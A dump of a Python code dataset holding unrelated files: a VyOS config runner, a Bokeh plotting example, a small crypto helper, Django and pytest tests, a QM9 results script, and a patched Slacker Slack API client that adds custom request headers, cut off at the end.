content
stringlengths
0
1.05M
origin
stringclasses
2 values
type
stringclasses
2 values
from cloudshell.devices.runners.configuration_runner import ConfigurationRunner from vyos.flows.restore import VyOSRestoreFlow from vyos.flows.save import VyOSSaveFlow class VyOSConfigurationRunner(ConfigurationRunner): @property def restore_flow(self): return VyOSRestoreFlow(cli_handler=self.cli_handler, logger=self._logger) @property def save_flow(self): return VyOSSaveFlow(cli_handler=self.cli_handler, logger=self._logger) @property def file_system(self): return "" def get_path(self, path=''): """ :param path: path to remote file storage :return: valid path or :raise Exception: """ return path
nilq/baby-python
python
from numpy.random import random from bokeh.plotting import * output_server("markers.py example") def myscatter(x, y, typestr): scatter(x, y, type=typestr, line_color="#6666ee", fill_color="#ee6666", fill_alpha=0.5, size=12, tools="pan,zoom") def mytext(x, y, textstr): text(x, y, text=textstr, angle=0, text_color="#449944", text_align="center", text_font_size="10pt", tools="pan,zoom") N = 10 hold() myscatter(random(N)+2, random(N)+1, "circle") myscatter(random(N)+4, random(N)+1, "square") myscatter(random(N)+6, random(N)+1, "triangle") myscatter(random(N)+8, random(N)+1, "asterisk") myscatter(random(N)+2, random(N)+4, "circle_x") myscatter(random(N)+4, random(N)+4, "square_x") myscatter(random(N)+6, random(N)+4, "invtriangle") myscatter(random(N)+8, random(N)+4, "x") myscatter(random(N)+2, random(N)+7, "circle_cross") myscatter(random(N)+4, random(N)+7, "square_cross") myscatter(random(N)+6, random(N)+7, "diamond") myscatter(random(N)+8, random(N)+7, "cross") mytext([2.5], [0.5], "circle / o") mytext([4.5], [0.5], "square") mytext([6.5], [0.5], "triangle") mytext([8.5], [0.5], "asterisk / *") mytext([2.5], [3.5], "circle_x / ox") mytext([4.5], [3.5], "square_x") mytext([6.5], [3.5], "invtriangle") mytext([8.5], [3.5], "x") mytext([2.5], [6.5], "circle_cross / o+") mytext([4.5], [6.5], "square_cross") mytext([6.5], [6.5], "diamond") mytext([8.5], [6.5], "cross / +")
nilq/baby-python
python
""" 개발환경 : PyQt5 x64, Python 3.4.3 x64, Windows 8.1 x64 파일 : CryptoCommon.py 내용 : 암호에서 자주 쓰이는 변수들을 지원할 예정 """ import os class CryptoCommon: common_long_keyspace = ' !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~' def __init__(self): self.message = '' self.key = 0 self.mode = '' self.letters = '' self.sourceType = False self.inputFile = '' self.outputFile = '' self.fileAccessType = False # 파일 저장 # 파일 저장 방식이 바이너리라면 바이너리방식으로 저장.... # 나중에 바이너리방식으로 통이할 것 def saveFile(self, filename, content, fileAccessType): try: if not fileAccessType: file = open(filename, mode='w', encoding='utf-8') else: file = open(filename, mode='wb') except: return False file.write(content) file.close() def loadFile(self, filename, fileAccessType): try: if not fileAccessType: file = open(filename, mode='r', encoding='utf-8') else: file = open(filename, mode='rb') except: return False content = file.read() file.close() return content def checkFileReadble(self, filename): if os.access(filename, os.R_OK): return True return False
nilq/baby-python
python
# -*- coding: utf-8 -*- # --------------------------------------------------------------------- # Checkpoint manager # --------------------------------------------------------------------- # Copyright (C) 2007-2019 The NOC Project # See LICENSE for details # --------------------------------------------------------------------- # Python modules import datetime # Third-party modules from django import forms # NOC modules from noc.lib.app.application import Application, view, HasPerm from noc.core.forms import NOCForm from noc.main.models.checkpoint import Checkpoint from noc.core.translation import ugettext as _ class CheckpointAppplication(Application): title = _("Checkpoints") class PrivateCheckpointForm(NOCForm): comment = forms.CharField(label=_("Comment")) class FullCheckpointForm(NOCForm): comment = forms.CharField(label=_("Comment")) is_private = forms.BooleanField(label=_("Private"), required=False) @view(url="^create/$", url_name="create", access=HasPerm("create")) def view_create(self, request): if request.user.is_superuser: form_class = self.FullCheckpointForm else: form_class = self.PrivateCheckpointForm if request.POST: form = form_class(request.POST) if form.is_valid(): Checkpoint.set_checkpoint( comment=form.cleaned_data["comment"], user=request.user, timestamp=datetime.datetime.now(), private=form.cleaned_data.get("is_private", False), ) self.message_user(request, _("Checkpoint has been set")) return self.close_popup(request) else: form = form_class({"is_private": True}) return self.render(request, "create.html", form=form)
nilq/baby-python
python
# -*- coding: utf-8 -*- from sys import maxsize from model.group import Group def test_add_group(app): old_groups = app.group.get_group_list() added_group = Group(name="Grop1", header="Heder1", footer="Footer1") app.group.create(added_group) assert len(old_groups)+1 == app.group.count() #"""хеш функция для предварительной проверки""" new_groups = app.group.get_group_list() old_groups.append(added_group) assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups,key=Group.id_or_max) def test_add_group2(app): old_groups = app.group.get_group_list() added_group = Group(name="Grop1", header="Heder1", footer="Footer1") app.group.create(added_group) assert len(old_groups) + 1 == app.group.count() new_groups = app.group.get_group_list() old_groups.append(added_group) assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups,key=Group.id_or_max)
nilq/baby-python
python
import pytest from django.conf import settings from django.contrib.messages import get_messages from django.core.exceptions import ObjectDoesNotExist from django.urls import reverse from tests.api_tokens_tests.factories import AuthTokenFactory from tests.factories import UserFactory from tests.utils import get_view_for_user @pytest.mark.django_db @pytest.mark.parametrize("view", ("list", "create")) def test_logged_in_views(client, view): viewname = f"api-tokens:{view}" response = get_view_for_user(client=client, viewname=viewname, user=None) assert response.status_code == 302 assert response.url == f"{settings.LOGIN_URL}?next={reverse(viewname)}" @pytest.mark.django_db def test_list_view_is_filtered(client): # AuthToken.create returns a tuple of (AuthToken, token) rather than just # an AuthToken, create_batch will return a list of these tokens = AuthTokenFactory.create_batch(2) response = get_view_for_user( client=client, viewname="api-tokens:list", user=tokens[0][0].user ) assert response.status_code == 200 assert len(response.context[-1]["object_list"]) == 1 assert tokens[0][0] in response.context[-1]["object_list"] assert tokens[1][0] not in response.context[-1]["object_list"] @pytest.mark.django_db def test_token_is_created_for_user(client): user = UserFactory() assert not user.auth_token_set.exists() response = get_view_for_user( client=client, method=client.post, viewname="api-tokens:create", data={}, user=user, ) assert response.status_code == 302 token = user.auth_token_set.get() assert token.expiry is None messages = list(get_messages(response.wsgi_request)) assert len(messages) == 1 assert str(messages[0]).startswith( f"Your new API token is:<br><br><pre>{token.token_key}" ) @pytest.mark.django_db def test_user_cannot_delete_token_of_another(client): token, _ = AuthTokenFactory() user = UserFactory() def _delete_token(u): return get_view_for_user( client=client, method=client.post, viewname="api-tokens:delete", reverse_kwargs={"token_key": token.token_key}, data={}, user=u, ) # Other user cannot delete assert _delete_token(user).status_code == 404 # Ensure the token still exists token.refresh_from_db() assert _delete_token(token.user).status_code == 302 # Token deleted by the owner with pytest.raises(ObjectDoesNotExist): token.refresh_from_db()
nilq/baby-python
python
from gfl.core.manager.node import GflNode from gfl.core.manager.manager import NodeManager
nilq/baby-python
python
import numpy as np targets = np.loadtxt('qm9_targets.dat',dtype=str)[:,1] factors = [1., 1., 27.2114, 27.2114, 27.2114, 1., 27211.4, 1., 1., 1., 1., 1., 0.043363, 0.043363, 0.043363, 0.043363, 1., 1., 1., 0.043363] assert len(factors) == len(targets) seeds = ['11','22','33'] mae_avg = [] mae_std = [] for target in targets: results = [] for seed in seeds: data = np.loadtxt('output/result--qm9-'+target+'--radius1--dim50--layer_hidden6--layer_output6--batch_train32--batch_test32--lr1e-4--lr_decay0.99--decay_interval10--iteration1000--seed'+seed+'.txt', skiprows=1) epoch, time, loss_train, mae_dev, mae_test = data.T result = mae_test[np.argmin(mae_dev)] results.append(result) mae_avg.append(np.mean(results)) mae_std.append(np.std(results)) for i in range(len(targets)): print('%9s %8.4f %8.4f'%(targets[i], mae_avg[i]*factors[i], mae_std[i]*factors[i]))
nilq/baby-python
python
import json import argparse import os import io import shutil import copy import sys from datetime import datetime from pick import pick from time import sleep from urllib.parse import urlparse import requests #################### Patched - Slacker ###################### # Purpose of the patch is to allow for a cookie header to be set # so that xoxc (slack client) tokens can be used. # Copyright 2015 Oktay Sancak # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json import requests import time ###### Slacker Utils ###### def get_api_url(method): """ Returns API URL for the given method. :param method: Method name :type method: str :returns: API URL for the given method :rtype: str """ return 'https://slack.com/api/{}'.format(method) def get_item_id_by_name(list_dict, key_name): for d in list_dict: if d['name'] == key_name: return d['id'] ########################### __version__ = '0.14.0' DEFAULT_TIMEOUT = 10 DEFAULT_RETRIES = 0 # seconds to wait after a 429 error if Slack's API doesn't provide one DEFAULT_WAIT = 20 __all__ = ['Error', 'Response', 'BaseAPI', 'API', 'Auth', 'Users', 'Groups', 'Channels', 'Chat', 'IM', 'IncomingWebhook', 'Search', 'Files', 'Stars', 'Emoji', 'Presence', 'RTM', 'Team', 'Reactions', 'Pins', 'UserGroups', 'UserGroupsUsers', 'MPIM', 'OAuth', 'DND', 'Bots', 'FilesComments', 'Reminders', 'TeamProfile', 'UsersProfile', 'IDPGroups', 'Apps', 'AppsPermissions', 'Slacker', 'Dialog', 'Conversations', 'Migration'] class Error(Exception): pass class Response(object): def __init__(self, body): self.raw = body self.body = json.loads(body) self.successful = self.body['ok'] self.error = self.body.get('error') def __str__(self): return json.dumps(self.body) # Patched # Pass the headers along to the requests call class BaseAPI(object): def __init__(self, token=None, headers=None, timeout=DEFAULT_TIMEOUT, proxies=None, session=None, rate_limit_retries=DEFAULT_RETRIES): self.headers = headers self.token = token self.timeout = timeout self.proxies = proxies self.session = session self.rate_limit_retries = rate_limit_retries def _request(self, request_method, method, **kwargs): if self.token: kwargs.setdefault('params', {})['token'] = self.token kwargs['headers'] = self.headers url = get_api_url(method) # while we have rate limit retries left, fetch the resource and back # off as Slack's HTTP response suggests for retry_num in range(self.rate_limit_retries): response = request_method( url, timeout=self.timeout, proxies=self.proxies, **kwargs ) if response.status_code == requests.codes.ok: break # handle HTTP 429 as documented at # https://api.slack.com/docs/rate-limits if response.status_code == requests.codes.too_many: time.sleep(int( response.headers.get('retry-after', DEFAULT_WAIT) )) continue response.raise_for_status() else: # with no retries left, make one final attempt to fetch the # resource, but do not handle too_many status differently response = request_method( url, timeout=self.timeout, proxies=self.proxies, **kwargs ) response.raise_for_status() response = Response(response.text) if not response.successful: raise Error(response.error) return response def _session_get(self, url, params=None, **kwargs): kwargs.setdefault('allow_redirects', True) return self.session.request( method='get', url=url, params=params, **kwargs ) def _session_post(self, url, data=None, **kwargs): return self.session.request( method='post', url=url, data=data, **kwargs ) def get(self, api, **kwargs): return self._request( self._session_get if self.session else requests.get, api, **kwargs ) def post(self, api, **kwargs): return self._request( self._session_post if self.session else requests.post, api, **kwargs ) class API(BaseAPI): def test(self, error=None, **kwargs): if error: kwargs['error'] = error return self.get('api.test', params=kwargs) class Auth(BaseAPI): def test(self): return self.get('auth.test') def revoke(self, test=True): return self.post('auth.revoke', data={'test': int(test)}) class Conversations(BaseAPI): def archive(self, channel): return self.post('conversations.archive', data={'channel': channel}) def close(self, channel): return self.post('conversations.close', data={'channel': channel}) def create(self, name, user_ids=None, is_private=None): if isinstance(user_ids, (list, tuple)): user_ids = ','.join(user_ids) return self.post( 'conversations.create', data={'name': name, 'user_ids': user_ids, 'is_private': is_private} ) def history(self, channel, cursor=None, inclusive=None, latest=None, oldest=None, limit=None): return self.get( 'conversations.history', params={ 'channel': channel, 'cursor': cursor, 'inclusive': inclusive, 'latest': latest, 'oldest': oldest, 'limit': limit } ) def info(self, channel, include_locale=None, include_num_members=None): return self.get( 'conversations.info', params={ 'channel': channel, 'include_locale': include_locale, 'include_num_members': include_num_members } ) def invite(self, channel, users): if isinstance(users, (list, tuple)): users = ','.join(users) return self.post( 'conversations.invite', data={'channel': channel, 'users': users} ) def join(self, channel): return self.post('conversations.join', data={'channel': channel}) def kick(self, channel, user): return self.post( 'conversations.kick', data={'channel': channel, 'user': user} ) def leave(self, channel): return self.post('conversations.leave', data={'channel': channel}) def list(self, cursor=None, exclude_archived=None, types=None, limit=None): if isinstance(types, (list, tuple)): types = ','.join(types) return self.get( 'conversations.list', params={ 'cursor': cursor, 'exclude_archived': exclude_archived, 'types': types, 'limit': limit } ) def members(self, channel, cursor=None, limit=None): return self.get( 'conversations.members', params={'channel': channel, 'cursor': cursor, 'limit': limit} ) def open(self, channel=None, users=None, return_im=None): if isinstance(users, (list, tuple)): users = ','.join(users) return self.post( 'conversations.open', data={'channel': channel, 'users': users, 'return_im': return_im} ) def rename(self, channel, name): return self.post( 'conversations.rename', data={'channel': channel, 'name': name} ) def replies(self, channel, ts, cursor=None, inclusive=None, latest=None, oldest=None, limit=None): return self.get( 'conversations.replies', params={ 'channel': channel, 'ts': ts, 'cursor': cursor, 'inclusive': inclusive, 'latest': latest, 'oldest': oldest, 'limit': limit } ) def set_purpose(self, channel, purpose): return self.post( 'conversations.setPurpose', data={'channel': channel, 'purpose': purpose} ) def set_topic(self, channel, topic): return self.post( 'conversations.setTopic', data={'channel': channel, 'topic': topic} ) def unarchive(self, channel): return self.post('conversations.unarchive', data={'channel': channel}) class Dialog(BaseAPI): def open(self, dialog, trigger_id): return self.post('dialog.open', data={ 'dialog': json.dumps(dialog), 'trigger_id': trigger_id, }) class UsersProfile(BaseAPI): def get(self, user=None, include_labels=False): return super(UsersProfile, self).get( 'users.profile.get', params={'user': user, 'include_labels': int(include_labels)} ) def set(self, user=None, profile=None, name=None, value=None): return self.post('users.profile.set', data={ 'user': user, 'profile': profile, 'name': name, 'value': value }) class UsersAdmin(BaseAPI): def invite(self, email, channels=None, first_name=None, last_name=None, resend=True): return self.post('users.admin.invite', params={ 'email': email, 'channels': channels, 'first_name': first_name, 'last_name': last_name, 'resend': resend }) class Users(BaseAPI): def __init__(self, *args, **kwargs): super(Users, self).__init__(*args, **kwargs) self._profile = UsersProfile(*args, **kwargs) self._admin = UsersAdmin(*args, **kwargs) @property def profile(self): return self._profile @property def admin(self): return self._admin def info(self, user, include_locale=False): return self.get('users.info', params={'user': user, 'include_locale': include_locale}) def list(self, presence=False): return self.get('users.list', params={'presence': int(presence)}) def identity(self): return self.get('users.identity') def set_active(self): return self.post('users.setActive') def get_presence(self, user): return self.get('users.getPresence', params={'user': user}) def set_presence(self, presence): return self.post('users.setPresence', data={'presence': presence}) def get_user_id(self, user_name): members = self.list().body['members'] return get_item_id_by_name(members, user_name) class Groups(BaseAPI): def create(self, name): return self.post('groups.create', data={'name': name}) def create_child(self, channel): return self.post('groups.createChild', data={'channel': channel}) def info(self, channel): return self.get('groups.info', params={'channel': channel}) def list(self, exclude_archived=None): return self.get('groups.list', params={'exclude_archived': exclude_archived}) def history(self, channel, latest=None, oldest=None, count=None, inclusive=None): return self.get('groups.history', params={ 'channel': channel, 'latest': latest, 'oldest': oldest, 'count': count, 'inclusive': inclusive }) def invite(self, channel, user): return self.post('groups.invite', data={'channel': channel, 'user': user}) def kick(self, channel, user): return self.post('groups.kick', data={'channel': channel, 'user': user}) def leave(self, channel): return self.post('groups.leave', data={'channel': channel}) def mark(self, channel, ts): return self.post('groups.mark', data={'channel': channel, 'ts': ts}) def rename(self, channel, name): return self.post('groups.rename', data={'channel': channel, 'name': name}) def replies(self, channel, thread_ts): return self.get('groups.replies', params={'channel': channel, 'thread_ts': thread_ts}) def archive(self, channel): return self.post('groups.archive', data={'channel': channel}) def unarchive(self, channel): return self.post('groups.unarchive', data={'channel': channel}) def open(self, channel): return self.post('groups.open', data={'channel': channel}) def close(self, channel): return self.post('groups.close', data={'channel': channel}) def set_purpose(self, channel, purpose): return self.post('groups.setPurpose', data={'channel': channel, 'purpose': purpose}) def set_topic(self, channel, topic): return self.post('groups.setTopic', data={'channel': channel, 'topic': topic}) class Channels(BaseAPI): def create(self, name): return self.post('channels.create', data={'name': name}) def info(self, channel): return self.get('channels.info', params={'channel': channel}) def list(self, exclude_archived=None, exclude_members=None): return self.get('channels.list', params={'exclude_archived': exclude_archived, 'exclude_members': exclude_members}) def history(self, channel, latest=None, oldest=None, count=None, inclusive=False, unreads=False): return self.get('channels.history', params={ 'channel': channel, 'latest': latest, 'oldest': oldest, 'count': count, 'inclusive': int(inclusive), 'unreads': int(unreads) }) def mark(self, channel, ts): return self.post('channels.mark', data={'channel': channel, 'ts': ts}) def join(self, name): return self.post('channels.join', data={'name': name}) def leave(self, channel): return self.post('channels.leave', data={'channel': channel}) def invite(self, channel, user): return self.post('channels.invite', data={'channel': channel, 'user': user}) def kick(self, channel, user): return self.post('channels.kick', data={'channel': channel, 'user': user}) def rename(self, channel, name): return self.post('channels.rename', data={'channel': channel, 'name': name}) def replies(self, channel, thread_ts): return self.get('channels.replies', params={'channel': channel, 'thread_ts': thread_ts}) def archive(self, channel): return self.post('channels.archive', data={'channel': channel}) def unarchive(self, channel): return self.post('channels.unarchive', data={'channel': channel}) def set_purpose(self, channel, purpose): return self.post('channels.setPurpose', data={'channel': channel, 'purpose': purpose}) def set_topic(self, channel, topic): return self.post('channels.setTopic', data={'channel': channel, 'topic': topic}) def get_channel_id(self, channel_name): channels = self.list().body['channels'] return get_item_id_by_name(channels, channel_name) class Chat(BaseAPI): def post_message(self, channel, text=None, username=None, as_user=None, parse=None, link_names=None, attachments=None, unfurl_links=None, unfurl_media=None, icon_url=None, icon_emoji=None, thread_ts=None, reply_broadcast=None, blocks=None, mrkdwn=True): # Ensure attachments are json encoded if attachments: if isinstance(attachments, list): attachments = json.dumps(attachments) return self.post('chat.postMessage', data={ 'channel': channel, 'text': text, 'username': username, 'as_user': as_user, 'parse': parse, 'link_names': link_names, 'attachments': attachments, 'unfurl_links': unfurl_links, 'unfurl_media': unfurl_media, 'icon_url': icon_url, 'icon_emoji': icon_emoji, 'thread_ts': thread_ts, 'reply_broadcast': reply_broadcast, 'blocks': blocks, 'mrkdwn': mrkdwn, }) def me_message(self, channel, text): return self.post('chat.meMessage', data={'channel': channel, 'text': text}) def command(self, channel, command, text): return self.post('chat.command', data={ 'channel': channel, 'command': command, 'text': text }) def update(self, channel, ts, text, attachments=None, parse=None, link_names=False, as_user=None, blocks=None): # Ensure attachments are json encoded if attachments is not None and isinstance(attachments, list): attachments = json.dumps(attachments) return self.post('chat.update', data={ 'channel': channel, 'ts': ts, 'text': text, 'attachments': attachments, 'parse': parse, 'link_names': int(link_names), 'as_user': as_user, 'blocks': blocks }) def delete(self, channel, ts, as_user=False): return self.post('chat.delete', data={ 'channel': channel, 'ts': ts, 'as_user': as_user }) def post_ephemeral(self, channel, text, user, as_user=None, attachments=None, link_names=None, parse=None, blocks=None): # Ensure attachments are json encoded if attachments is not None and isinstance(attachments, list): attachments = json.dumps(attachments) return self.post('chat.postEphemeral', data={ 'channel': channel, 'text': text, 'user': user, 'as_user': as_user, 'attachments': attachments, 'link_names': link_names, 'parse': parse, 'blocks': blocks }) def unfurl(self, channel, ts, unfurls, user_auth_message=None, user_auth_required=False, user_auth_url=None): return self.post('chat.unfurl', data={ 'channel': channel, 'ts': ts, 'unfurls': unfurls, 'user_auth_message': user_auth_message, 'user_auth_required': user_auth_required, 'user_auth_url': user_auth_url, }) def get_permalink(self, channel, message_ts): return self.get('chat.getPermalink', params={ 'channel': channel, 'message_ts': message_ts }) class IM(BaseAPI): def list(self): return self.get('im.list') def history(self, channel, latest=None, oldest=None, count=None, inclusive=None, unreads=False): return self.get('im.history', params={ 'channel': channel, 'latest': latest, 'oldest': oldest, 'count': count, 'inclusive': inclusive, 'unreads': int(unreads) }) def replies(self, channel, thread_ts): return self.get('im.replies', params={'channel': channel, 'thread_ts': thread_ts}) def mark(self, channel, ts): return self.post('im.mark', data={'channel': channel, 'ts': ts}) def open(self, user): return self.post('im.open', data={'user': user}) def close(self, channel): return self.post('im.close', data={'channel': channel}) class MPIM(BaseAPI): def open(self, users): if isinstance(users, (tuple, list)): users = ','.join(users) return self.post('mpim.open', data={'users': users}) def close(self, channel): return self.post('mpim.close', data={'channel': channel}) def mark(self, channel, ts): return self.post('mpim.mark', data={'channel': channel, 'ts': ts}) def list(self): return self.get('mpim.list') def history(self, channel, latest=None, oldest=None, inclusive=False, count=None, unreads=False): return self.get('mpim.history', params={ 'channel': channel, 'latest': latest, 'oldest': oldest, 'inclusive': int(inclusive), 'count': count, 'unreads': int(unreads) }) def replies(self, channel, thread_ts): return self.get('mpim.replies', params={'channel': channel, 'thread_ts': thread_ts}) class Search(BaseAPI): def all(self, query, sort=None, sort_dir=None, highlight=None, count=None, page=None): return self.get('search.all', params={ 'query': query, 'sort': sort, 'sort_dir': sort_dir, 'highlight': highlight, 'count': count, 'page': page }) def files(self, query, sort=None, sort_dir=None, highlight=None, count=None, page=None): return self.get('search.files', params={ 'query': query, 'sort': sort, 'sort_dir': sort_dir, 'highlight': highlight, 'count': count, 'page': page }) def messages(self, query, sort=None, sort_dir=None, highlight=None, count=None, page=None): return self.get('search.messages', params={ 'query': query, 'sort': sort, 'sort_dir': sort_dir, 'highlight': highlight, 'count': count, 'page': page }) class FilesComments(BaseAPI): def add(self, file_, comment): return self.post('files.comments.add', data={'file': file_, 'comment': comment}) def delete(self, file_, id_): return self.post('files.comments.delete', data={'file': file_, 'id': id_}) def edit(self, file_, id_, comment): return self.post('files.comments.edit', data={'file': file_, 'id': id_, 'comment': comment}) class Files(BaseAPI): def __init__(self, *args, **kwargs): super(Files, self).__init__(*args, **kwargs) self._comments = FilesComments(*args, **kwargs) @property def comments(self): return self._comments def list(self, user=None, ts_from=None, ts_to=None, types=None, count=None, page=None, channel=None): return self.get('files.list', params={ 'user': user, 'ts_from': ts_from, 'ts_to': ts_to, 'types': types, 'count': count, 'page': page, 'channel': channel }) def info(self, file_, count=None, page=None): return self.get('files.info', params={'file': file_, 'count': count, 'page': page}) def upload(self, file_=None, content=None, filetype=None, filename=None, title=None, initial_comment=None, channels=None, thread_ts=None): if isinstance(channels, (tuple, list)): channels = ','.join(channels) data = { 'content': content, 'filetype': filetype, 'filename': filename, 'title': title, 'initial_comment': initial_comment, 'channels': channels, 'thread_ts': thread_ts } if file_: if isinstance(file_, str): with open(file_, 'rb') as f: return self.post( 'files.upload', data=data, files={'file': f} ) return self.post( 'files.upload', data=data, files={'file': file_} ) return self.post('files.upload', data=data) def delete(self, file_): return self.post('files.delete', data={'file': file_}) def revoke_public_url(self, file_): return self.post('files.revokePublicURL', data={'file': file_}) def shared_public_url(self, file_): return self.post('files.sharedPublicURL', data={'file': file_}) class Stars(BaseAPI): def add(self, file_=None, file_comment=None, channel=None, timestamp=None): assert file_ or file_comment or channel return self.post('stars.add', data={ 'file': file_, 'file_comment': file_comment, 'channel': channel, 'timestamp': timestamp }) def list(self, user=None, count=None, page=None): return self.get('stars.list', params={'user': user, 'count': count, 'page': page}) def remove(self, file_=None, file_comment=None, channel=None, timestamp=None): assert file_ or file_comment or channel return self.post('stars.remove', data={ 'file': file_, 'file_comment': file_comment, 'channel': channel, 'timestamp': timestamp }) class Emoji(BaseAPI): def list(self): return self.get('emoji.list') class Presence(BaseAPI): AWAY = 'away' ACTIVE = 'active' TYPES = (AWAY, ACTIVE) def set(self, presence): assert presence in Presence.TYPES, 'Invalid presence type' return self.post('presence.set', data={'presence': presence}) class RTM(BaseAPI): def start(self, simple_latest=False, no_unreads=False, mpim_aware=False): return self.get('rtm.start', params={ 'simple_latest': int(simple_latest), 'no_unreads': int(no_unreads), 'mpim_aware': int(mpim_aware), }) def connect(self): return self.get('rtm.connect') class TeamProfile(BaseAPI): def get(self, visibility=None): return super(TeamProfile, self).get( 'team.profile.get', params={'visibility': visibility} ) class Team(BaseAPI): def __init__(self, *args, **kwargs): super(Team, self).__init__(*args, **kwargs) self._profile = TeamProfile(*args, **kwargs) @property def profile(self): return self._profile def info(self): return self.get('team.info') def access_logs(self, count=None, page=None, before=None): return self.get('team.accessLogs', params={ 'count': count, 'page': page, 'before': before }) def integration_logs(self, service_id=None, app_id=None, user=None, change_type=None, count=None, page=None): return self.get('team.integrationLogs', params={ 'service_id': service_id, 'app_id': app_id, 'user': user, 'change_type': change_type, 'count': count, 'page': page, }) def billable_info(self, user=None): return self.get('team.billableInfo', params={'user': user}) class Reactions(BaseAPI): def add(self, name, file_=None, file_comment=None, channel=None, timestamp=None): # One of file, file_comment, or the combination of channel and timestamp # must be specified assert (file_ or file_comment) or (channel and timestamp) return self.post('reactions.add', data={ 'name': name, 'file': file_, 'file_comment': file_comment, 'channel': channel, 'timestamp': timestamp, }) def get(self, file_=None, file_comment=None, channel=None, timestamp=None, full=None): return super(Reactions, self).get('reactions.get', params={ 'file': file_, 'file_comment': file_comment, 'channel': channel, 'timestamp': timestamp, 'full': full, }) def list(self, user=None, full=None, count=None, page=None): return super(Reactions, self).get('reactions.list', params={ 'user': user, 'full': full, 'count': count, 'page': page, }) def remove(self, name, file_=None, file_comment=None, channel=None, timestamp=None): # One of file, file_comment, or the combination of channel and timestamp # must be specified assert (file_ or file_comment) or (channel and timestamp) return self.post('reactions.remove', data={ 'name': name, 'file': file_, 'file_comment': file_comment, 'channel': channel, 'timestamp': timestamp, }) class Pins(BaseAPI): def add(self, channel, file_=None, file_comment=None, timestamp=None): # One of file, file_comment, or timestamp must also be specified assert file_ or file_comment or timestamp return self.post('pins.add', data={ 'channel': channel, 'file': file_, 'file_comment': file_comment, 'timestamp': timestamp, }) def remove(self, channel, file_=None, file_comment=None, timestamp=None): # One of file, file_comment, or timestamp must also be specified assert file_ or file_comment or timestamp return self.post('pins.remove', data={ 'channel': channel, 'file': file_, 'file_comment': file_comment, 'timestamp': timestamp, }) def list(self, channel): return self.get('pins.list', params={'channel': channel}) class UserGroupsUsers(BaseAPI): def list(self, usergroup, include_disabled=None): if isinstance(include_disabled, bool): include_disabled = int(include_disabled) return self.get('usergroups.users.list', params={ 'usergroup': usergroup, 'include_disabled': include_disabled, }) def update(self, usergroup, users, include_count=None): if isinstance(users, (tuple, list)): users = ','.join(users) if isinstance(include_count, bool): include_count = int(include_count) return self.post('usergroups.users.update', data={ 'usergroup': usergroup, 'users': users, 'include_count': include_count, }) class UserGroups(BaseAPI): def __init__(self, *args, **kwargs): super(UserGroups, self).__init__(*args, **kwargs) self._users = UserGroupsUsers(*args, **kwargs) @property def users(self): return self._users def list(self, include_disabled=None, include_count=None, include_users=None): if isinstance(include_disabled, bool): include_disabled = int(include_disabled) if isinstance(include_count, bool): include_count = int(include_count) if isinstance(include_users, bool): include_users = int(include_users) return self.get('usergroups.list', params={ 'include_disabled': include_disabled, 'include_count': include_count, 'include_users': include_users, }) def create(self, name, handle=None, description=None, channels=None, include_count=None): if isinstance(channels, (tuple, list)): channels = ','.join(channels) if isinstance(include_count, bool): include_count = int(include_count) return self.post('usergroups.create', data={ 'name': name, 'handle': handle, 'description': description, 'channels': channels, 'include_count': include_count, }) def update(self, usergroup, name=None, handle=None, description=None, channels=None, include_count=None): if isinstance(channels, (tuple, list)): channels = ','.join(channels) if isinstance(include_count, bool): include_count = int(include_count) return self.post('usergroups.update', data={ 'usergroup': usergroup, 'name': name, 'handle': handle, 'description': description, 'channels': channels, 'include_count': include_count, }) def disable(self, usergroup, include_count=None): if isinstance(include_count, bool): include_count = int(include_count) return self.post('usergroups.disable', data={ 'usergroup': usergroup, 'include_count': include_count, }) def enable(self, usergroup, include_count=None): if isinstance(include_count, bool): include_count = int(include_count) return self.post('usergroups.enable', data={ 'usergroup': usergroup, 'include_count': include_count, }) class DND(BaseAPI): def team_info(self, users=None): if isinstance(users, (tuple, list)): users = ','.join(users) return self.get('dnd.teamInfo', params={'users': users}) def set_snooze(self, num_minutes): return self.post('dnd.setSnooze', data={'num_minutes': num_minutes}) def info(self, user=None): return self.get('dnd.info', params={'user': user}) def end_dnd(self): return self.post('dnd.endDnd') def end_snooze(self): return self.post('dnd.endSnooze') class Migration(BaseAPI): def exchange(self, users, to_old=False): if isinstance(users, (list, tuple)): users = ','.join(users) return self.get( 'migration.exchange', params={'users': users, 'to_old': to_old} ) class Reminders(BaseAPI): def add(self, text, time, user=None): return self.post('reminders.add', data={ 'text': text, 'time': time, 'user': user, }) def complete(self, reminder): return self.post('reminders.complete', data={'reminder': reminder}) def delete(self, reminder): return self.post('reminders.delete', data={'reminder': reminder}) def info(self, reminder): return self.get('reminders.info', params={'reminder': reminder}) def list(self): return self.get('reminders.list') class Bots(BaseAPI): def info(self, bot=None): return self.get('bots.info', params={'bot': bot}) class IDPGroups(BaseAPI): def list(self, include_users=False): return self.get('idpgroups.list', params={'include_users': int(include_users)}) class OAuth(BaseAPI): def access(self, client_id, client_secret, code, redirect_uri=None): return self.post('oauth.access', data={ 'client_id': client_id, 'client_secret': client_secret, 'code': code, 'redirect_uri': redirect_uri }) def token(self, client_id, client_secret, code, redirect_uri=None, single_channel=None): return self.post('oauth.token', data={ 'client_id': client_id, 'client_secret': client_secret, 'code': code, 'redirect_uri': redirect_uri, 'single_channel': single_channel, }) class AppsPermissions(BaseAPI): def info(self): return self.get('apps.permissions.info') def request(self, scopes, trigger_id): return self.post('apps.permissions.request', data={ scopes: ','.join(scopes), trigger_id: trigger_id, }) class Apps(BaseAPI): def __init__(self, *args, **kwargs): super(Apps, self).__init__(*args, **kwargs) self._permissions = AppsPermissions(*args, **kwargs) @property def permissions(self): return self._permissions def uninstall(self, client_id, client_secret): return self.get( 'apps.uninstall', params={'client_id': client_id, 'client_secret': client_secret} ) class IncomingWebhook(object): def __init__(self, url=None, timeout=DEFAULT_TIMEOUT, proxies=None): self.url = url self.timeout = timeout self.proxies = proxies def post(self, data): """ Posts message with payload formatted in accordance with this documentation https://api.slack.com/incoming-webhooks """ if not self.url: raise Error('URL for incoming webhook is undefined') return 